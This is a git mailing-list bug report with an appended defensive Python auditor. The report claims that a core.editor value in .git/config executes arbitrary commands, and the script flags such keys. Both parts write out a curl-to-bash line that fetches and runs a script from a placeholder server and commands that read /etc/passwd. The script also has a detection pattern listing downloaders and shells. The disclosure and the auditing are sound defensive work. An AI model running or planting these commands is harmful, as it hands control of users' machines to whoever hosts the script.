Hi git community!
I found what seems to be a vulnerability/bug in git. I'm running
version 2.7.4 on Ubuntu xenial, but also tested with the latest version
2.19.0.rc0.2.g29d9e3e.
The steps to reproduce are:
1. open your .git/conf
2. add something like:
[core]
editor = ls /etc/passwd
or even
editor = curl -s http://server/path/malicious-script.sh | bash -s
3. run: git commit
A malicious user/repo can set some code through a URL or even as a command
in .git/conf and take control of your machine or silently run
malicious code.
[]'s
--
----------------------------------------------
Leônidas S. Barbosa (Kirotawa)
blog: corecode.wordpress.com
---------------------------------------------
"What matters are the countless small acts of unknown people,
who lay the foundations for the significant events that
become history" - Howard Zinn
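A defensive check for the behaviour the report describes, added here as an example; it is not code from the report or from git itself. It parses a repository-local config file (the text of `.git/config`) with a minimal parser written for this example and flags keys whose values git hands to a shell, such as `core.editor`, or `!`-prefixed aliases. The set of command-executing keys is illustrative rather than exhaustive, the token list used to rate a value as suspicious is a heuristic, and the sample config is constructed (it reuses the two `editor` values from the report).

```python
"""Audit a repository-local git config for keys git expands as shell commands.

Added example, not git's own code. Assumes the config is supplied as text in
git's INI-like format; includes and multi-line continuations are not handled.
"""
import re
from typing import Dict, List, Tuple

# Config keys whose value git passes to a shell. Illustrative subset, not exhaustive.
COMMAND_KEYS = {
    "core.editor", "core.pager", "core.sshcommand", "sequence.editor",
    "credential.helper", "diff.external", "gpg.program",
}
# Keys with a user-chosen middle component, e.g. filter.lfs.clean, difftool.x.cmd.
COMMAND_KEY_PATTERNS = [
    re.compile(r"^filter\.[^.]+\.(clean|smudge|process)$"),
    re.compile(r"^difftool\.[^.]+\.cmd$"),
    re.compile(r"^mergetool\.[^.]+\.cmd$"),
]
# Heuristic: pipes, chaining, substitution, URLs and downloaders in a command value.
SUSPICIOUS = re.compile(r"(\||;|&&|\$\(|`|https?://|\bcurl\b|\bwget\b|\bbash\b|\bsh\b)")

SECTION_RE = re.compile(r'^\[([^\s"\]]+)(?:\s+"((?:[^"\\]|\\.)*)")?\]$')


def parse_git_config(text: str) -> Dict[str, str]:
    """Return {'section[.subsection].key': value} for a git-style config text.

    Handles [section], [section "sub"], '#'/';' comment lines, 'key = value'
    lines and bare 'key' lines (which git treats as true). Keys are lower-cased
    the way git matches them; subsection names keep their case.
    """
    entries: Dict[str, str] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            name = m.group(1).lower()
            section = f"{name}.{m.group(2)}" if m.group(2) is not None else name
            continue
        if section is None:  # key before any section header: ignore
            continue
        key, sep, value = line.partition("=")
        key = key.strip().lower()
        if not key:
            continue
        value = value.strip() if sep else "true"
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        entries[f"{section}.{key}"] = value
    return entries


def is_command_key(key: str) -> bool:
    """True if git runs the value of this key through a shell."""
    return key in COMMAND_KEYS or any(p.match(key) for p in COMMAND_KEY_PATTERNS)


def audit_repo_config(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value, reason) for each entry that makes git execute a command.

    Any command-executing key in a *repo-local* config is reported, because such
    settings normally belong in the user's global config; the reason is extended
    when the value also contains shell or download tokens.
    """
    findings = []
    for key, value in parse_git_config(text).items():
        if key.startswith("alias.") and value.startswith("!"):
            findings.append((key, value, "shell alias in repo-local config"))
        elif is_command_key(key):
            reason = "command key in repo-local config"
            if SUSPICIOUS.search(value):
                reason += "; value contains pipe/shell/URL tokens"
            findings.append((key, value, reason))
    return findings


# Constructed sample .git/config; the editor value is the one from the report.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\teditor = curl -s http://server/path/malicious-script.sh | bash -s
[remote "origin"]
\turl = https://example.invalid/repo.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[alias]
\tst = status
\tpeek = !ls /etc/passwd
"""

if __name__ == "__main__":
    for key, value, reason in audit_repo_config(SAMPLE_CONFIG):
        print(f"{key} = {value!r}: {reason}")
```

Run it against a real repository with `audit_repo_config(open(".git/config").read())`; an empty result means no command-executing key is set at the repository level, which is the state a freshly cloned repository should be in.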